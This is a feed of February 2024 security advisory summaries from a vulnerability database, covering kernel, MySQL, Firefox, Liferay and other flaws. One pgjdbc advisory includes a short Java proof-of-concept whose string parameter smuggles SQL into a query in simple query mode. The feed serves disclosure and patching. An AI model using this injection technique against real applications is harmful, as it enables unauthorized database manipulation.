https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-W3W6-26F2-P474
20.02.2024 10:00:00	msrc	[MS:CVE-2024-21315] Microsoft Defender for Endpoint Protection Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21315
21.02.2024 02:16:34	npm	[NPM:GHSA-3JCV-5F9P-2F2P] Cross-site Scripting in electron-pdf (high)	electron-pdf version 20.0.0 allows an external attacker to remotely obtainarbitrary local files. This is possible because the application does notvalidate the HTML content entered by the user.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3JCV-5F9P-2F2P
20.02.2024 02:00:00	oraclelinux	[ELSA-2024-0150] .NET 8.0 security update (important)	[8.0.101-1.0.1]- Add support for Oracle Linux- Update to .NET SDK 8.0.101 and Runtime 8.0.1	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0150
20.02.2024 02:00:00	oraclelinux	[ELSA-2024-0888] edk2 security update (low)	[20220126gitbb1bba3d77-6.el8_9.3]- edk2-Bumped-openssl-submodule-version-to-cf317b2bb227.patch [RHEL-7560]- Resolves: RHEL-7560 (CVE-2023-3446 edk2: openssl: Excessive time spent checking DH keys and parameters [rhel-8])	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0888
20.02.2024 02:00:00	oraclelinux	[ELSA-2024-0889] oniguruma security update (moderate)	[6.8.2-2.1]- Fix CVE-2019-13224 Resolves: RHEL-6970- Fix CVE-2019-16163 Resolves: RHEL-9506- Fix CVE-2019-19012 Resolves: RHEL-9511- Fix CVE-2019-19203 Resolves: RHEL-9510- Fix CVE-2019-19204 Resolves: RHEL-9509	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0889
20.02.2024 02:00:00	oraclelinux	[ELSA-2024-0893] python-pillow security update (important)	[5.1.1-18.1]- Security fix for CVE-2023-50447Resolves: RHEL-22240	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0893
20.02.2024 02:00:00	redhat	[RHSA-2024:0879] java-1.8.0-ibm security update (moderate)	IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.This update upgrades IBM Java SE 8 to version 8 SR8-FP15.Security Fix(es):* IBM JDK: Eclipse OpenJ9 JVM denial of service (CVE-2023-5676)* OpenJDK: IOR deserialization issue in CORBA (8303384) (CVE-2023-22067)* OpenJDK: certificate path validation issue during client authentication (8309966) (CVE-2023-22081)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0879
20.02.2024 02:00:00	redhat	[RHSA-2024:0887] go-toolset:rhel8 security update (moderate)	Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang. Security Fix(es):* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)* golang: cmd/go: Protocol Fallback when fetching modules (CVE-2023-45285)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0887
20.02.2024 02:00:00	redhat	[RHSA-2024:0888] edk2 security update (low)	EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es):* openssl: Excessive time spent checking DH keys and parameters (CVE-2023-3446)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0888
20.02.2024 02:00:00	redhat	[RHSA-2024:0893] python-pillow security update (important)	The python-pillow packages contain a Python image processing library that provides extensive file format support, an efficient internal representation, and powerful image-processing capabilities.Security Fix(es):* pillow: Arbitrary Code Execution via the environment parameter (CVE-2023-50447)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0893
20.02.2024 02:00:00	mozilla	[MFSA-2024-06] Security Vulnerabilities fixed in Firefox ESR 115.8 (high)	- CVE-2024-1546: Out-of-bounds memory read in networking channels (high)When storing and re-accessing data on a networking channel, the length of buffers may have been confused, resulting in an out-of-bounds memory read.- CVE-2024-1547: Alert dialog could have been spoofed on another site (high)Through a series of API calls and redirects, an attacker-controlled alert dialog could have been displayed on another website (with the victim website's URL shown).- CVE-2024-1548: Fullscreen Notification could have been hidden by select element (moderate)A website could have obscured the fullscreen notification by using a dropdown select input element. This could have led to user confusion and possible spoofing attacks.- CVE-2024-1549: Custom cursor could obscure the permission dialog (moderate)If a website set a large custom cursor, portions of the cursor could have overlapped with the permission dialog, potentially resulting in user confusion and unexpected granted permissions.- CVE-2024-1550: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (moderate)A malicious website could have used a combination of exiting fullscreen mode and <code>requestPointerLock</code> to cause the user's mouse to be re-positioned unexpectedly, which could have led to user confusion and inadvertently granting permissions they did not intend to grant.- CVE-2024-1551: Multipart HTTP Responses would accept the Set-Cookie header in response parts (moderate)Set-Cookie response headers were being incorrectly honored in multipart HTTP responses. If an attacker could control the Content-Type response header, as well as control part of the response body, they could inject Set-Cookie response headers that would have been honored by the browser.- CVE-2024-1552: Incorrect code generation on 32-bit ARM devices (low)Incorrect code generation could have led to unexpected numeric conversions and potential undefined behavior.Note: This issue only affects 32-bit ARM devices.- CVE-2024-1553: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (high)Memory safety bugs present in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-06
20.02.2024 02:00:00	mozilla	[MFSA-2024-05] Security Vulnerabilities fixed in Firefox 123 (high)	- CVE-2024-1546: Out-of-bounds memory read in networking channels (high)When storing and re-accessing data on a networking channel, the length of buffers may have been confused, resulting in an out-of-bounds memory read.- CVE-2024-1547: Alert dialog could have been spoofed on another site (high)Through a series of API calls and redirects, an attacker-controlled alert dialog could have been displayed on another website (with the victim website's URL shown).- CVE-2024-1548: Fullscreen Notification could have been hidden by select element (moderate)A website could have obscured the fullscreen notification by using a dropdown select input element. This could have led to user confusion and possible spoofing attacks.- CVE-2024-1549: Custom cursor could obscure the permission dialog (moderate)If a website set a large custom cursor, portions of the cursor could have overlapped with the permission dialog, potentially resulting in user confusion and unexpected granted permissions.- CVE-2024-1550: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (moderate)A malicious website could have used a combination of exiting fullscreen mode and <code>requestPointerLock</code> to cause the user's mouse to be re-positioned unexpectedly, which could have led to user confusion and inadvertently granting permissions they did not intend to grant.- CVE-2024-1551: Multipart HTTP Responses would accept the Set-Cookie header in response parts (moderate)Set-Cookie response headers were being incorrectly honored in multipart HTTP responses. If an attacker could control the Content-Type response header, as well as control part of the response body, they could inject Set-Cookie response headers that would have been honored by the browser.- CVE-2024-1552: Incorrect code generation on 32-bit ARM devices (low)Incorrect code generation could have led to unexpected numeric conversions and potential undefined behavior. Note: This issue only affects 32-bit ARM devices.- CVE-2024-1553: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (high)Memory safety bugs present in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.- CVE-2024-1554: fetch could be used to effect cache poisoning (moderate)The <code>fetch()</code> API and navigation incorrectly shared the same cache, as the cache key did not include the optional headers <code>fetch()</code> may contain. Under the correct circumstances, an attacker may have been able to poison the local browser cache by priming it with a <code>fetch()</code> response controlled by the additional headers. Upon navigation to the same URL, the user would see the cached response instead of the expected response.- CVE-2024-1555: SameSite cookies were not properly respected when opening a website from an external browser (moderate)When opening a website using the <code>firefox://</code> protocol handler, SameSite cookies were not properly respected.- CVE-2024-1556: Invalid memory access in the built-in profiler (low)The incorrect object was checked for NULL in the built-in profiler, potentially leading to invalid memory access and undefined behavior. Note: This issue only affects the application when the profiler is running.- CVE-2024-1557: Memory safety bugs fixed in Firefox 123 (high)Memory safety bugs present in Firefox 122. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-05
20.02.2024 02:00:00	mozilla	[MFSA-2024-07] Security Vulnerabilities fixed in Thunderbird 115.8 (high)	In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-07
20.02.2024 02:00:00	redhat	[RHSA-2024:0876] kpatch-patch security update (important)	This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: net/sched: sch_hfsc UAF (CVE-2023-4623)* kernel: use-after-free in sch_qfq network scheduler (CVE-2023-4921)* kernel: IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0876
20.02.2024 02:00:00	redhat	[RHSA-2024:0881] kernel-rt security update (important)	The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.Security Fix(es):* kernel: net/sched: sch_hfsc UAF (CVE-2023-4623)* kernel: use-after-free in sch_qfq network scheduler (CVE-2023-4921)* kernel: inactive elements in nft_pipapo_walk (CVE-2023-6817)* kernel: IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)* kernel: nfp: use-after-free in area_cache_get() (CVE-2022-3545)* kernel: null-ptr-deref vulnerabilities in sl_tx_timeout in drivers/net/slip (CVE-2022-41858)* kernel: HID: check empty report_list in hid_validate_values() (CVE-2023-1073)* kernel: Possible use-after-free since the two fdget() during vhost_net_set_backend() (CVE-2023-1838)* kernel: NULL pointer dereference in can_rcv_filter (CVE-2023-2166)* kernel: Slab-out-of-bound read in compare_netdev_and_ip (CVE-2023-2176)* kernel: A heap out-of-bounds write when function perf_read_group is called and sibling_list is smaller than its child's sibling_list (CVE-2023-5717)* kernel: NULL pointer dereference in nvmet_tcp_build_iovec (CVE-2023-6356)* kernel: NULL pointer dereference in nvmet_tcp_execute_request (CVE-2023-6535)* kernel: NULL pointer dereference in __nvmet_req_complete (CVE-2023-6536)* kernel: Out-Of-Bounds Read vulnerability in smbCalcSize (CVE-2023-6606)* kernel: OOB Access in smb2_dump_detail (CVE-2023-6610)* kernel: use-after-free in l2cap_sock_release in net/bluetooth/l2cap_sock.c (CVE-2023-40283)* kernel: SEV-ES local priv escalation (CVE-2023-46813)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0881
20.02.2024 02:00:00	redhat	[RHSA-2024:0889] oniguruma security update (moderate)	Oniguruma is a regular expressions library that supports a variety of character encodings. Security Fix(es):* oniguruma: Use-after-free in onig_new_deluxe() in regext.c (CVE-2019-13224)* oniguruma: Stack exhaustion in regcomp.c because of recursion in regparse.c (CVE-2019-16163)* oniguruma: integer overflow in search_in_range function in regexec.c leads to out-of-bounds read (CVE-2019-19012)* oniguruma: Heap-based buffer over-read in function gb18030_mbc_enc_len in file gb18030.c (CVE-2019-19203)* oniguruma: Heap-based buffer over-read in function fetch_interval_quantifier in regparse.c (CVE-2019-19204)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0889
20.02.2024 02:00:00	redhat	[RHSA-2024:0897] kernel security update (important)	The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: net/sched: sch_hfsc UAF (CVE-2023-4623)* kernel: use-after-free in sch_qfq network scheduler (CVE-2023-4921)* kernel: inactive elements in nft_pipapo_walk (CVE-2023-6817)* kernel: IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)* kernel: nfp: use-after-free in area_cache_get() (CVE-2022-3545)* kernel: null-ptr-deref vulnerabilities in sl_tx_timeout in drivers/net/slip (CVE-2022-41858)* kernel: HID: check empty report_list in hid_validate_values() (CVE-2023-1073)* kernel: Possible use-after-free since the two fdget() during vhost_net_set_backend() (CVE-2023-1838)* kernel: NULL pointer dereference in can_rcv_filter (CVE-2023-2166)* kernel: Slab-out-of-bound read in compare_netdev_and_ip (CVE-2023-2176)* kernel: A heap out-of-bounds write when function perf_read_group is called and sibling_list is smaller than its child's sibling_list (CVE-2023-5717)* kernel: NULL pointer dereference in nvmet_tcp_build_iovec (CVE-2023-6356)* kernel: NULL pointer dereference in nvmet_tcp_execute_request (CVE-2023-6535)* kernel: NULL pointer dereference in __nvmet_req_complete (CVE-2023-6536)* kernel: Out-Of-Bounds Read vulnerability in smbCalcSize (CVE-2023-6606)* kernel: OOB Access in smb2_dump_detail (CVE-2023-6610)* kernel: use-after-free in l2cap_sock_release in net/bluetooth/l2cap_sock.c (CVE-2023-40283)* kernel: SEV-ES local priv escalation (CVE-2023-46813)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0897
20.02.2024 02:00:00	redhat	[RHSA-2024:0894] mysql:8.0 security update (moderate)	MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries.Security Fix(es):* mysql: InnoDB unspecified vulnerability (CPU Apr 2023) (CVE-2023-21911)* mysql: Server: DDL unspecified vulnerability (CPU Apr 2023) (CVE-2023-21919, CVE-2023-21929, CVE-2023-21933)* mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2023) (CVE-2023-21920, CVE-2023-21935, CVE-2023-21945, CVE-2023-21946, CVE-2023-21976, CVE-2023-21977, CVE-2023-21982)* mysql: Server: Components Services unspecified vulnerability (CPU Apr 2023) (CVE-2023-21940, CVE-2023-21947, CVE-2023-21962)* mysql: Server: Partition unspecified vulnerability (CPU Apr 2023) (CVE-2023-21953, CVE-2023-21955)* mysql: Server: JSON unspecified vulnerability (CPU Apr 2023) (CVE-2023-21966)* mysql: Server: DML unspecified vulnerability (CPU Apr 2023) (CVE-2023-21972)* mysql: Client programs unspecified vulnerability (CPU Apr 2023) (CVE-2023-21980)* mysql: Server: Replication unspecified vulnerability (CPU Jul 2023) (CVE-2023-22005, CVE-2023-22007, CVE-2023-22057)* mysql: InnoDB unspecified vulnerability (CPU Jul 2023) (CVE-2023-22008)* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2023) (CVE-2023-22032, CVE-2023-22059, CVE-2023-22064, CVE-2023-22065, CVE-2023-22070, CVE-2023-22078, CVE-2023-22079, CVE-2023-22092, CVE-2023-22103, CVE-2023-22110, CVE-2023-22112)* mysql: InnoDB unspecified vulnerability (CPU Jul 2023) (CVE-2023-22033)* mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2023) (CVE-2023-22046, CVE-2023-22054, CVE-2023-22056)* mysql: Client programs unspecified vulnerability (CPU Jul 2023) (CVE-2023-22053)* mysql: Server: DDL unspecified vulnerability (CPU Jul 2023) (CVE-2023-22058)* mysql: InnoDB unspecified vulnerability (CPU Oct 2023) (CVE-2023-22066, CVE-2023-22068, CVE-2023-22084, CVE-2023-22097, CVE-2023-22104, CVE-2023-22114)* mysql: Server: UDF unspecified vulnerability (CPU Oct 2023) (CVE-2023-22111)* mysql: Server: DML unspecified vulnerability (CPU Oct 2023) (CVE-2023-22115)* mysql: Server: RAPID unspecified vulnerability (CPU Jan 2024) (CVE-2024-20960)* mysql: Server: Security: Encryption unspecified vulnerability (CPU Jan 2024) (CVE-2024-20963)* mysql: Server: Security: Privileges unspecified vulnerability (CPU Jan 2024) (CVE-2024-20964)* mysql: Server: Replication unspecified vulnerability (CPU Jan 2024) (CVE-2024-20967)* mysql: Server: Options unspecified vulnerability (CPU Jan 2024) (CVE-2024-20968)* mysql: Server: DDL unspecified vulnerability (CPU Jan 2024) (CVE-2024-20969)* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2024) (CVE-2024-20961, CVE-2024-20962, CVE-2024-20965, CVE-2024-20966, CVE-2024-20970, CVE-2024-20971, CVE-2024-20972, CVE-2024-20973, CVE-2024-20974, CVE-2024-20976, CVE-2024-20977, CVE-2024-20978, CVE-2024-20982)* mysql: Server: DDL unspecified vulnerability (CPU Jan 2024) (CVE-2024-20981)* mysql: Server: DML unspecified vulnerability (CPU Jan 2024) (CVE-2024-20983)* mysql: Server : Security : Firewall unspecified vulnerability (CPU Jan 2024) (CVE-2024-20984)* mysql: Server: UDF unspecified vulnerability (CPU Jan 2024) (CVE-2024-20985)* zstd: mysql: buffer overrun in util.c (CVE-2022-4899)* mysql: Server: Security: Privileges unspecified vulnerability (CPU Jul 2023) (CVE-2023-22038)* mysql: Server: Pluggable Auth unspecified vulnerability (CPU Jul 2023) (CVE-2023-22048)* mysql: Server: Security: Encryption unspecified vulnerability (CPU Oct 2023) (CVE-2023-22113)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* Fix for MySQL bug #33630199 in 8.0.32 introduces regression when --set-gtid-purged=OFF (RHEL-22452)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0894
21.02.2024 02:04:53	maven	[MAVEN:GHSA-XFG6-62PX-CXC2] SQL injection in pgjdbc (critical)	pgjdbc, the PostgreSQL JDBC Driver, allows attacker to inject SQL if using PreferQueryMode=SIMPLE. Note this is not the default. In the default mode there is no vulnerability. A placeholder for a numeric value must be immediately preceded by a minus. There must be a second placeholder for a string value after the first placeholder; both must be on the same line. By constructing a matching string payload, the attacker can inject SQL to alter the query,bypassing the protections that parameterized queries bring against SQL Injection attacks. Versions before 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, and 42.2.8 are affected.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XFG6-62PX-CXC2
21.02.2024 01:59:30	maven	[MAVEN:GHSA-4265-CCF5-PHJ5] Apache Commons Compress: OutOfMemoryError unpacking broken Pack200 file (high)	Allocation of Resources Without Limits or Throttling vulnerability in Apache Commons Compress. This issue affects Apache Commons Compress: from 1.21 before 1.26.Users are recommended to upgrade to version 1.26, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4265-CCF5-PHJ5
21.02.2024 01:58:09	npm	[NPM:GHSA-5JJQ-8CVJ-V6M9] Cross-site Scripting in Serenity (moderate)	Serenity before 6.8.0 allows XSS via an email link because LoginPage.tsx permits return URLs that do not begin with a / character.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5JJQ-8CVJ-V6M9
22.02.2024 01:33:46	maven	[MAVEN:GHSA-24RP-Q3W6-VC56] org.postgresql:postgresql vulnerable to SQL Injection via line comment generation (critical)	# ImpactSQL injection is possible when using the non-default connection property `preferQueryMode=simple` in combination with application code that has a vulnerable SQL that negates a parameter value.There is no vulnerability in the driver when using the default query mode. Users that do not override the query mode are not impacted.# ExploitationTo exploit this behavior the following conditions must be met:1. A placeholder for a numeric value must be immediately preceded by a minus (i.e. `-`)1. There must be a second placeholder for a string value after the first placeholder on the same line. 1. Both parameters must be user controlled.The prior behavior of the driver when operating in simple query mode would inline the negative value of the first parameter and cause the resulting line to be treated as a `--` SQL comment. That would extend to the beginning of the next parameter and cause the quoting of that parameter to be consumed by the comment line. If that string parameter includes a newline, the resulting text would appear unescaped in the resulting SQL.When operating in the default extended query mode this would not be an issue as the parameter values are sent separately to the server. Only in simple query mode the parameter values are inlined into the executed SQL causing this issue.# Example```javaPreparedStatement stmt = conn.prepareStatement("SELECT -?, ?");stmt.setInt(1, -1);stmt.setString(2, "\nWHERE false --");ResultSet rs = stmt.executeQuery();```The resulting SQL when operating in simple query mode would be:```sqlSELECT --1,'WHERE false --'```The contents of the second parameter get injected into the command. Note how both the number of result columns and the WHERE clause of the command have changed. A more elaborate example could execute arbitrary other SQL commands.# PatchProblem will be patched upgrade to 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, 42.2.28, 42.2.28.jre7The patch fixes the inlining of parameters by forcing them all to be serialized as wrapped literals. The SQL in the prior example would be transformed into:```sqlSELECT -('-1'::int4), ('WHERE false --')```# WorkaroundsDo not use the connection property`preferQueryMode=simple`. (NOTE: If you do not explicitly specify a query mode then you are using the default of `extended` and are not impacted by this issue.)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-24RP-Q3W6-VC56
21.02.2024 22:04:41	slackware	[SSA:2024-052-01] mozilla-thunderbird	New mozilla-thunderbird packages are available for Slackware 15.0 and -currentto fix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-thunderbird-115.8.0-i686-1_slack15.0.txz: Upgraded. This release contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/thunderbird/115.8.0/releasenotes/ https://www.mozilla.org/en-US/security/advisories/mfsa2024-07/ https://www.cve.org/CVERecord?id=CVE-2024-1546 https://www.cve.org/CVERecord?id=CVE-2024-1547 https://www.cve.org/CVERecord?id=CVE-2024-1548 https://www.cve.org/CVERecord?id=CVE-2024-1549 https://www.cve.org/CVERecord?id=CVE-2024-1550 https://www.cve.org/CVERecord?id=CVE-2024-1551 https://www.cve.org/CVERecord?id=CVE-2024-1552 https://www.cve.org/CVERecord?id=CVE-2024-1553 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.8.0-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.8.0-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-115.8.0-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-115.8.0-x86_64-1.txzMD5 signaturesSlackware 15.0 package:d3d1b94d2a3b3f91332b715bd5d9de86 mozilla-thunderbird-115.8.0-i686-1_slack15.0.txzSlackware x86_64 15.0 package:44205eca60c837bd493a1b267159bb71 mozilla-thunderbird-115.8.0-x86_64-1_slack15.0.txzSlackware -current package:74dc8d5d260c5a7c72b08756c862a9d1 xap/mozilla-thunderbird-115.8.0-i686-1.txzSlackware x86_64 -current package:f1ba91048f709093600bd291bbfee65c xap/mozilla-thunderbird-115.8.0-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-thunderbird-115.8.0-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-052-01
21.02.2024 21:33:24	maven	[MAVEN:GHSA-4HFP-M9GV-M753] XWiki extension license information is public, exposing instance id and license holder details (moderate)	### ImpactThe licensor application includes the document `Licenses.Code.LicenseJSON` that provides information for admins regarding active licenses. This document is public and thus exposes this information publicly. The information includes the instance's id as well as first and last name and email of the license owner. This is a leak of information that isn't supposed to be public. The instance id allows associating data on the [active installs data](https://extensions.xwiki.org/xwiki/bin/view/Extension/Active%20Installs%202%20API/) with the concrete XWiki instance. Active installs assures that "there's no way to find who's having a given UUID" (referring to the instance id). Further, the information who the license owner is and information about the obtained licenses can be used for targeted phishing attacks. Also, while user information is normally public, email addresses might only be displayed obfuscated (depending on the configuration).### PatchesThis has been fixed in Application Licensing 1.24.2, by https://github.com/xwikisas/application-licensing/commit/d168fb88fc0d121bf95e769ea21c55c00bebe5a6### WorkaroundsThere are no known workarounds besides upgrading.### ReferencesFixed by https://github.com/xwikisas/application-licensing/commit/d168fb88fc0d121bf95e769ea21c55c00bebe5a6	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4HFP-M9GV-M753
21.02.2024 18:00:00	cisco	[CISCO-SA-CUIC-ACCESS-CONTROL-JJSZQMJJ] Cisco Unified Intelligence Center Insufficient Access Control Vulnerability (medium)	A vulnerability in the Live Data server of Cisco Unified Intelligence Center could allow an unauthenticated, local attacker to read and modify data in a repository that belongs to an internal service on an affected device.This vulnerability is due to insufficient access control implementations on cluster configuration CLI requests. An attacker could exploit this vulnerability by sending a cluster configuration CLI request to specific directories on an affected device. A successful exploit could allow the attacker to read and modify data that is handled by an internal service on the affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cuis-access-control-jJsZQMjj ["https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cuis-access-control-jJsZQMjj"]	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CUIC-ACCESS-CONTROL-JJSZQMJJ
22.02.2024 01:19:55	maven	[MAVEN:GHSA-Q2CV-7J58-RFMJ] Liferay Portal Document and Media widget and Liferay DXP vulnerable to stored Cross-site Scripting (critical)	Stored cross-site scripting (XSS) vulnerability in the Document and Media widget in Liferay Portal 7.4.3.18 through 7.4.3.101, and Liferay DXP 2023.Q3 before patch 6, and 7.4 update 18 through 92 allows remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into a document's “Title” text field.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-Q2CV-7J58-RFMJ
22.02.2024 01:32:26	maven	[MAVEN:GHSA-HGR6-6HHW-883F] Liferay Portal Calendar module and Liferay DXP vulnerable to Cross-site Scripting, content spoofing (moderate)	The Calendar module in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 15, and older unsupported versions does not escape user supplied data in the default notification email template, which allows remote authenticated users to inject arbitrary web script or HTML via the title of a calendar event or the user's name. This may lead to a content spoofing or cross-site scripting (XSS) attacks depending on the capability of the receiver's mail client.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HGR6-6HHW-883F
22.02.2024 01:31:56	maven	[MAVEN:GHSA-RWHV-HVJ2-QRQM] Liferay Portal Frontend JS module's portlet.js and Liferay DXP vulnerable to Cross-site Scripting (critical)	Cross-site scripting (XSS) vulnerability in the Frontend JS module's portlet.js in Liferay Portal 7.2.0 through 7.4.3.37, and Liferay DXP 7.4 before update 38, 7.3 before update 11, 7.2 before fix pack 20, and older unsupported versions allows remote attackers to inject arbitrary web script or HTML via the anchor (hash) part of a URL.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RWHV-HVJ2-QRQM
22.02.2024 01:30:55	maven	[MAVEN:GHSA-RWXC-4CMW-7X75] Liferay Portal and Liferay DXP vulnerable to stored Cross-site Scripting (critical)	Multiple stored cross-site scripting (XSS) vulnerabilities in Liferay Portal 7.2.0 through 7.4.3.13, and older unsupported versions, and Liferay DXP 7.4 before update 10, 7.3 before update 4, 7.2 before fix pack 17, and older unsupported versions allow remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into the first/middle/last name text field of the user who creates an entry in the (1) Announcement widget, or (2) Alerts widget.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RWXC-4CMW-7X75
22.02.2024 01:30:21	maven	[MAVEN:GHSA-73X3-8MRG-5R93] Liferay Portal Language Override edit screen and Liferay DXP vulnerable to reflected Cross-site Scripting (critical)	Reflected cross-site scripting (XSS) vulnerability in the Language Override edit screen in Liferay Portal 7.4.3.8 through 7.4.3.97, and Liferay DXP 2023.Q3 before patch 5, and 7.4 update 4 through 92 allows remote attackers to inject arbitrary web script or HTML via the `_com_liferay_portal_language_override_web_internal_portlet_PLOPortlet_key` parameter.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-73X3-8MRG-5R93
22.02.2024 01:30:00	maven	[MAVEN:GHSA-468X-FRCM-GHX6] Liferay Portal and Liferay DXP vulnerable to reflected Cross-site Scripting (critical)	Reflected cross-site scripting (XSS) vulnerability in the instance settings for Accounts in Liferay Portal 7.4.3.44 through 7.4.3.97, and Liferay DXP 2023.Q3 before patch 6, and 7.4 update 44 through 92 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into the “Blocked Email Domains” text field	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-468X-FRCM-GHX6
22.02.2024 01:29:50	maven	[MAVEN:GHSA-54PV-R62J-9QQC] Liferay Portal and Liferay DXP vulnerable to reflected Cross-site Scripting (critical)	Reflected cross-site scripting (XSS) vulnerability on the add assignees to a role page in Liferay Portal 7.3.3 through 7.4.3.97, and Liferay DXP 2023.Q3 before patch 6, 7.4 GA through update 92, and 7.3 before update 34 allows remote attackers to inject arbitrary web script or HTML via the `_com_liferay_roles_admin_web_portlet_RolesAdminPortlet_tabs2` parameter.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-54PV-R62J-9QQC
